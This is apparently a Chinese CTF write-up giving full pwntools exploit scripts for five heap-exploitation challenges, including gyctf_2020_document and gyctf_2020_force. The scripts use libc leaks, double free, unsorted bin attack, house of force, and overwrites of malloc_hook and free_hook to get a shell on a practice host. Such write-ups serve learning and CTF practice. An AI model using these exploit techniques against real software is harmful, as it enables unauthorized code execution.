gyctf_2020_document
堆上有指针,通过劫持堆上的指针控制free_hook或者malloc_hook从而getshell
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
binary = 'gyctf_2020_document'
elf = ELF('gyctf_2020_document')
libc = elf.libc
context.binary = binary
DEBUG = 1
# DEBUG=1 runs the binary locally; the remote branch has no host/port filled in here.
if DEBUG:
    p = process(binary)
else:
    host = ""
    port = 0
    p = remote(host, port)


def l64():
    """Receive up to the next 0x7f byte; unpack the last 6 bytes, zero-padded to 8, with u64."""
    chunk = p.recvuntil("\x7f")
    return u64(chunk[-6:].ljust(8, "\x00"))


def l32():
    """Receive up to the next 0xf7 byte; unpack the last 4 bytes, zero-padded to 4, with u32."""
    chunk = p.recvuntil("\xf7")
    return u32(chunk[-4:].ljust(4, "\x00"))


def sla(a, b):
    """sendlineafter(), with both arguments passed through str()."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """sendafter(), with both arguments passed through str()."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log *data* in hex under *name* via p.success()."""
    hex_part = ": 0x%x" % data
    return p.success(name + hex_part)


def se(payload):
    """Raw send of *payload*."""
    return p.send(payload)


def sl(payload):
    """Send *payload* followed by a newline."""
    return p.sendline(payload)


def ru(a):
    """Receive until str(a) is seen."""
    return p.recvuntil(str(a))
def add(name, sex, payload):
    """Menu choice 1: answer the name, sex and information prompts, in that order, with raw sends."""
    sla("Give me your choice : \n", "1")
    answers = (("name\n", name), ("sex\n", sex), ("information\n", payload))
    for prompt, value in answers:
        sa(prompt, value)
def show(idx):
    """Menu choice 2 on slot *idx*."""
    for prompt, value in (('Give me your choice : \n', "2"),
                          ('Give me your index : \n', str(idx))):
        sla(prompt, value)
def free(idx):
    """Menu choice 4 on slot *idx*."""
    for prompt, value in (('Give me your choice : \n', "4"),
                          ('Give me your index : \n', str(idx))):
        sla(prompt, value)
def edit(idx, payload):
    """Menu choice 3 on slot *idx*: confirm the sex-change prompt with "Y", then send *payload* raw."""
    line_answers = (('Give me your choice : \n', "3"),
                    ("Give me your index : \n", str(idx)),
                    ('Are you sure change sex?\n', "Y"))
    for prompt, value in line_answers:
        sla(prompt, value)
    sa('Now change information\n', payload)
add("aaaaaaaa","bbbbbbbb","c"*112)
add("aaaaaaaa","bbbbbbbb","c"*112)
free(0)
show(0)
libc_base = l64()-0x3c4b78
lg("libc_base",libc_base)
free_hook = libc_base+0x3c67a8
lg('free_hook',free_hook)
sys_addr =0x45390+libc_base
add("/bin/sh\x00","/bin/sh\x00","c"*0x70)
free(1)
add("/bin/sh\x00","/bin/sh\x00","c"*0x70)
edit(0,p64(0)+p64(0x21)+p64(free_hook-0x10)+p64(0x1)+p64(0)+p64(0x51)+p64(0)*8)
edit(3,p64(sys_addr)+p64(0)*13)
free(1)
p.interactive()
gyctf_2020_signin
申请堆块的大小固定,由于是ubuntu18因此存在着tcache机制,我们申请8个堆块,然后释放,有一个堆块进入unsorted bin,接着用unsorted bin attack来填写ptr处的值使其不为0,从而调用后门函数
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
binary = 'gyctf_2020_signin'
elf = ELF('gyctf_2020_signin')
libc = elf.libc
context.binary = binary
DEBUG = 0
# DEBUG=0 here, so the script connects to the remote practice host below.
if DEBUG:
    p = process(binary)
else:
    host = "node3.buuoj.cn"
    port = 27747
    p = remote(host, port)


def l64():
    """Receive up to the next 0x7f byte; unpack the last 6 bytes, zero-padded to 8, with u64."""
    chunk = p.recvuntil("\x7f")
    return u64(chunk[-6:].ljust(8, "\x00"))


def l32():
    """Receive up to the next 0xf7 byte; unpack the last 4 bytes, zero-padded to 4, with u32."""
    chunk = p.recvuntil("\xf7")
    return u32(chunk[-4:].ljust(4, "\x00"))


def sla(a, b):
    """sendlineafter(), with both arguments passed through str()."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """sendafter(), with both arguments passed through str()."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log *data* in hex under *name* via p.success()."""
    hex_part = ": 0x%x" % data
    return p.success(name + hex_part)


def se(payload):
    """Raw send of *payload*."""
    return p.send(payload)


def sl(payload):
    """Send *payload* followed by a newline."""
    return p.sendline(payload)


def ru(a):
    """Receive until str(a) is seen."""
    return p.recvuntil(str(a))
def add(idx):
    """Menu choice 1 on index *idx*."""
    for prompt, value in (("your choice?", "1"), ("idx?\n", str(idx))):
        sla(prompt, value)
def free(idx):
    """Menu choice 3 on index *idx*."""
    for prompt, value in (("your choice?", "3"), ("idx?\n", str(idx))):
        sla(prompt, value)
def edit(idx, payload):
    """Menu choice 2 on index *idx*, then *payload* is sent raw (no prompt is awaited)."""
    for prompt, value in (("your choice?", "2"), ("idx?\n", str(idx))):
        sla(prompt, value)
    se(payload)
def backdoor():
    """Menu choice 6 (the writeup calls this the backdoor entry)."""
    choice = "6"
    sla("your choice?", choice)
# allocate indexes 0..7, then free all of them (the writeup: one chunk ends up in the unsorted bin)
for i in range(8):
    add(i)
for i in range(8):
    free(i)
# unsorted bin attack; 0x4040C0 is a fixed address — presumably the `ptr` the writeup mentions, TODO(review): confirm
edit(7,p64(0x4040C0-0x10))
add(8)
backdoor()
p.interactive()
interesting
使用格式化字符串泄露地址,存在UAF漏洞,直接构造double free链劫持malloc_hook
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
binary = 'interesting'
elf = ELF('interesting')
libc = elf.libc
context.binary = binary
DEBUG = 0
# DEBUG=0 here, so the script connects to the remote practice host below.
if DEBUG:
    p = process(binary)
else:
    host = "node3.buuoj.cn"
    port = 25188
    p = remote(host, port)
def debug(cmd):
    """Pause until Enter is pressed on stdin, then attach gdb (with script *cmd*) to *p*."""
    _ = raw_input("debug:")
    target = p
    gdb.attach(target, cmd)
def l64():
    """Receive up to the next 0x7f byte; unpack the last 6 bytes, zero-padded to 8, with u64."""
    chunk = p.recvuntil("\x7f")
    return u64(chunk[-6:].ljust(8, "\x00"))


def l32():
    """Receive up to the next 0xf7 byte; unpack the last 4 bytes, zero-padded to 4, with u32."""
    chunk = p.recvuntil("\xf7")
    return u32(chunk[-4:].ljust(4, "\x00"))


def sla(a, b):
    """sendlineafter(), with both arguments passed through str()."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """sendafter(), with both arguments passed through str()."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log *data* in hex under *name* via p.success()."""
    hex_part = ": 0x%x" % data
    return p.success(name + hex_part)


def se(payload):
    """Raw send of *payload*."""
    return p.send(payload)


def sl(payload):
    """Send *payload* followed by a newline."""
    return p.sendline(payload)


def ru(a):
    """Receive until str(a) is seen."""
    return p.recvuntil(str(a))
sla("please:","OreOOrereOOreO%17$p")
sla(" to do :","0")
ru("OreOOrereOOreO")
ru("0x")
libc_base = int(p.recv(12),16)-0x20830
lg("libc_base",libc_base)
malloc_hook = libc_base+0x3c4b10
lg("malloc_hook",malloc_hook)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
one = o_g[3]+libc_base
lg("one",one)
def add(size, O, length, RE):
    """Menu choice 1: *size* and *length* answer the two "length :" prompts; *O* and *RE* are sent raw."""
    steps = (
        (sla, "to do :", "1"),
        (sla, "length :", str(size)),
        (sa, "O : ", O),
        (sla, "length :", str(length)),
        (sa, "RE : ", RE),
    )
    for send, prompt, value in steps:
        send(prompt, value)
def edit(idx, payload1, payload2):
    """Menu choice 2 on Oreo ID *idx*: *payload1* answers the O prompt, *payload2* the RE prompt (both raw)."""
    sla("to do :", "2")
    sla("> Oreo ID : ", str(idx))
    for prompt, body in (("> O : ", payload1), ("> RE : ", payload2)):
        sa(prompt, body)
def free(idx):
    """Menu choice 3 on Oreo ID *idx*."""
    for prompt, value in (("to do :", "3"), ("> Oreo ID : ", str(idx))):
        sla(prompt, value)
def puts(idx):
    """Menu choice 4 on Oreo ID *idx*."""
    for prompt, value in (("to do :", "4"), ("> Oreo ID : ", str(idx))):
        sla(prompt, value)
add(0x60,"aaaa",0x70,"bbbb")
add(0x60,"cccc",0x70,"dddd")
free(1)
free(2)
free(1)
add(0x60,p64(malloc_hook-0x23),0x70,"aaaa")
add(0x60,p64(malloc_hook-0x23),0x70,"bbbb")
add(0x60,p64(malloc_hook-0x23),0x60,"a"*0x13+p64(one))
#gdb.attach(p)
sla("to do :","1")
sla("length :",str(0x20))
p.interactive()
gyctf_2020_force
house of force劫持malloc_hook,因为one_gadget全部失效,因此需要和realloc_hook配合使用
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'
binary = 'gyctf_2020_force'
elf = ELF('gyctf_2020_force')
libc = elf.libc
context.binary = binary
DEBUG = 0
# DEBUG=0 here, so the script connects to the remote practice host below.
if DEBUG:
    p = process(binary)
else:
    host = "node3.buuoj.cn"
    port = 25028
    p = remote(host, port)
def debug(cmd):
    """Pause until Enter is pressed on stdin, then attach gdb (with script *cmd*) to *p*."""
    _ = raw_input("debug:")
    target = p
    gdb.attach(target, cmd)
def l64():
    """Receive up to the next 0x7f byte; unpack the last 6 bytes, zero-padded to 8, with u64."""
    chunk = p.recvuntil("\x7f")
    return u64(chunk[-6:].ljust(8, "\x00"))


def l32():
    """Receive up to the next 0xf7 byte; unpack the last 4 bytes, zero-padded to 4, with u32."""
    chunk = p.recvuntil("\xf7")
    return u32(chunk[-4:].ljust(4, "\x00"))


def sla(a, b):
    """sendlineafter(), with both arguments passed through str()."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """sendafter(), with both arguments passed through str()."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log *data* in hex under *name* via p.success()."""
    hex_part = ": 0x%x" % data
    return p.success(name + hex_part)


def se(payload):
    """Raw send of *payload*."""
    return p.send(payload)


def sl(payload):
    """Send *payload* followed by a newline."""
    return p.sendline(payload)
def add(size, payload):
    """Menu choice 1: send *size* at the size prompt, parse the 12 hex digits the
    program prints after "0x", send *payload* raw at the content prompt, and
    return the parsed address as an int."""
    sla("puts\n", "1")
    sla("size\n", str(size))
    p.recvuntil("0x")
    hex_digits = p.recv(12)
    addr = int(hex_digits, 16)  # parsed before the content is sent, as in the original ordering
    sa("content\n", payload)
    return addr
def puts():
    """Menu choice 2."""
    choice = "2"
    sla("puts\n", choice)
# a 0x200000-byte request; add() returns the address the program prints for it
addr = add(0x200000,"aaaaaa")
lg("addr",addr)
# NOTE(review): 0x200ff0 and 0x3c4b10 are hard-coded offsets for one libc build — confirm against the target
libc_base = addr + 0x200ff0
lg("libc_base",libc_base)
malloc_hook = libc_base+0x3c4b10
lg("malloc_hook",malloc_hook)
# a 0x20-byte content for a 0x18 request; the returned address +0x10 is taken as `top` (house of force, per writeup)
top = add(0x18,"a"*0x10+p64(0)+p64(0xffffffffffffffff))+0x10
lg("top",top)
realloc = libc_base+libc.sym["__libc_realloc"]  # the one address that is read from the loaded `libc` symbols
lg("realloc",realloc)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]  # one_gadget offsets (per writeup); index 1 is used here
one = o_g[1]+libc_base
offset = malloc_hook-top
lg("offset",offset)
add((offset-0x33),"aaaa")  # the 0x33 adjustment is hard-coded — TODO(review): confirm
add(0x10,"a"*0x8+p64(one)+p64(realloc+16))  # realloc+16: the offset into realloc the writeup pairs with the hook
#gdb.attach(p)
# one more menu-1 request, answered only up to the size prompt (the add() helper is bypassed here)
sla("puts\n","1")
sla("size\n",str(0x20))
p.interactive()
exceting
程序首先将flag文件读进了程序中,并且在0x6020a0处还存在着一个0x60的size,因此我们把堆块劫持到0x6020a0的位置,便可以直接show出flag
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'
binary = 'exceting'
elf = ELF('exceting')
libc = elf.libc
context.binary = binary
DEBUG = 0
# DEBUG=0 here, so the script connects to the remote practice host below.
if DEBUG:
    p = process(binary)
else:
    host = "node3.buuoj.cn"
    port = 26040
    p = remote(host, port)
def debug(cmd):
    """Pause until Enter is pressed on stdin, then attach gdb (with script *cmd*) to *p*."""
    _ = raw_input("debug:")
    target = p
    gdb.attach(target, cmd)
def l64():
    """Receive up to the next 0x7f byte; unpack the last 6 bytes, zero-padded to 8, with u64."""
    chunk = p.recvuntil("\x7f")
    return u64(chunk[-6:].ljust(8, "\x00"))


def l32():
    """Receive up to the next 0xf7 byte; unpack the last 4 bytes, zero-padded to 4, with u32."""
    chunk = p.recvuntil("\xf7")
    return u32(chunk[-4:].ljust(4, "\x00"))


def sla(a, b):
    """sendlineafter(), with both arguments passed through str()."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """sendafter(), with both arguments passed through str()."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log *data* in hex under *name* via p.success()."""
    hex_part = ": 0x%x" % data
    return p.success(name + hex_part)


def se(payload):
    """Raw send of *payload*."""
    return p.send(payload)


def sl(payload):
    """Send *payload* followed by a newline."""
    return p.sendline(payload)
def add(length, ba, size, na):
    """Menu choice 1: *length*/*ba* answer the first length and "ba :" prompts,
    *size*/*na* the second length and "na :" prompts; every answer is a full line."""
    steps = (
        ("do :", "1"),
        ("length :", str(length)),
        ("ba :", ba),
        ("length :", str(size)),
        ("na :", na),
    )
    for prompt, value in steps:
        sla(prompt, value)
def free(idx):
    """Menu choice 3 on ID *idx*."""
    for prompt, value in (("do :", "3"), ("ID :", str(idx))):
        sla(prompt, value)
def show(idx):
    """Menu choice 4 on ID *idx*."""
    for prompt, value in (("do :", "4"), ("ID :", str(idx))):
        sla(prompt, value)
add(0x50,"aaaa",0x50,"aaaa")
add(0x50,"bbbb",0x50,"bbbb")
free(0)
free(1)
free(0)
add(0x50,p64(0x6020a0-8),0x50,p64(0x6020a0-8))
add(0x50,p64(0x6020a0-8),0x50,p64(0x6020a0-8))
add(0x50,"",0x30,"")
show(2)
#gdb.attach(p)
p.interactive()